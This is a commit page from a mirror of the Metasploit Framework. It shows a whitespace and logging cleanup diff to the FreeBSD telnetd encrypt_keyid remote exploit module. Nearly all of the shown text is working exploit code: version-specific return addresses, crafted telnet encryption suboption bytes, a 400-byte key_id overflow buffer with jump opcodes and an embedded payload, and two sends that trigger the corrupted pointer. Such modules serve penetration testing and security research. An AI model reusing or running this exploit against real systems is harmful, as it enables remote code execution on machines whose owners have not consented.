infosecn1nja
/
metasploit-framework
mirror of https://github.com/infosecn1nja/metasploit-framework.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

Whitespace cleanup, also change print_status usage when verbose

unstable
sinn3r 2012-01-09 02:21:39 -06:00
parent 2f9d563067
commit 03a39f7fe8
1 changed files with 16 additions and 16 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

32
modules/exploits/freebsd/telnet/telnet_encrypt_keyid.rb
View File

@ -15,7 +15,7 @@ require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote class Metasploit3 < Msf::Exploit::Remote
Rank = GreatRanking Rank = GreatRanking
include Msf::Exploit::Remote::Telnet include Msf::Exploit::Remote::Telnet
include Msf::Exploit::BruteTargets include Msf::Exploit::BruteTargets
@ -45,7 +45,7 @@ class Metasploit3 < Msf::Exploit::Remote
'Targets' => 'Targets' =>
[ [
[ 'Automatic', { } ], [ 'Automatic', { } ],
[ 'FreeBSD 8.2', { 'Ret' => 0x0804a8a9 } ], # call edx [ 'FreeBSD 8.2', { 'Ret' => 0x0804a8a9 } ], # call edx
[ 'FreeBSD 8.1', { 'Ret' => 0x0804a889 } ], # call edx [ 'FreeBSD 8.1', { 'Ret' => 0x0804a889 } ], # call edx
[ 'FreeBSD 8.0', { 'Ret' => 0x0804a869 } ], # call edx [ 'FreeBSD 8.0', { 'Ret' => 0x0804a869 } ], # call edx
@ -63,10 +63,10 @@ class Metasploit3 < Msf::Exploit::Remote
end end
def exploit_target(t) def exploit_target(t)
connect connect
banner_sanitized = Rex::Text.to_hex_ascii(banner.to_s) banner_sanitized = Rex::Text.to_hex_ascii(banner.to_s)
print_status(banner_sanitized) if datastore['VERBOSE'] vprint_status(banner_sanitized)
enc_init = "\xff\xfa\x26\x00\x01\x01\x12\x13\x14\x15\x16\x17\x18\x19\xff\xf0" enc_init = "\xff\xfa\x26\x00\x01\x01\x12\x13\x14\x15\x16\x17\x18\x19\xff\xf0"
enc_keyid = "\xff\xfa\x26\x07" enc_keyid = "\xff\xfa\x26\x07"
@ -74,18 +74,18 @@ class Metasploit3 < Msf::Exploit::Remote
# Telnet protocol requires 0xff to be escaped with another # Telnet protocol requires 0xff to be escaped with another
penc = payload.encoded.gsub("\xff", "\xff\xff") penc = payload.encoded.gsub("\xff", "\xff\xff")
key_id = Rex::Text.rand_text_alphanumeric(400) key_id = Rex::Text.rand_text_alphanumeric(400)
key_id[ 0, 2] = "\xeb\x76" key_id[ 0, 2] = "\xeb\x76"
key_id[72, 4] = [ t['Ret'] - 20 ].pack("V") key_id[72, 4] = [ t['Ret'] - 20 ].pack("V")
key_id[76, 4] = [ t['Ret'] ].pack("V") key_id[76, 4] = [ t['Ret'] ].pack("V")
# Some of these bytes can get mangled, jump over them # Some of these bytes can get mangled, jump over them
key_id[80,112] = Rex::Text.rand_text_alphanumeric(112) key_id[80,112] = Rex::Text.rand_text_alphanumeric(112)
# Bounce to the real payload (avoid corruption) # Bounce to the real payload (avoid corruption)
key_id[120, 2] = "\xeb\x46" key_id[120, 2] = "\xeb\x46"
# The actual payload # The actual payload
key_id[192, penc.length] = penc key_id[192, penc.length] = penc
@ -94,7 +94,7 @@ class Metasploit3 < Msf::Exploit::Remote
# Initiate encryption # Initiate encryption
sock.put(enc_init) sock.put(enc_init)
# Wait for a successful response # Wait for a successful response
loop do loop do
data = sock.get_once(-1, 5) rescue nil data = sock.get_once(-1, 5) rescue nil
@ -106,8 +106,8 @@ class Metasploit3 < Msf::Exploit::Remote
# The first request smashes the pointer # The first request smashes the pointer
print_status("Sending first payload") print_status("Sending first payload")
sock.put(sploit) sock.put(sploit)
# Make sure the server replied to the first request # Make sure the server replied to the first request
data = sock.get_once(-1, 5) data = sock.get_once(-1, 5)
unless data unless data
@ -117,13 +117,13 @@ class Metasploit3 < Msf::Exploit::Remote
# Some delay between each request seems necessary in some cases # Some delay between each request seems necessary in some cases
::IO.select(nil, nil, nil, 0.5) ::IO.select(nil, nil, nil, 0.5)
# The second request results in the pointer being called # The second request results in the pointer being called
print_status("Sending second payload...") print_status("Sending second payload...")
sock.put(sploit) sock.put(sploit)
handler handler
::IO.select(nil, nil, nil, 0.5) ::IO.select(nil, nil, nil, 0.5)
disconnect disconnect
end end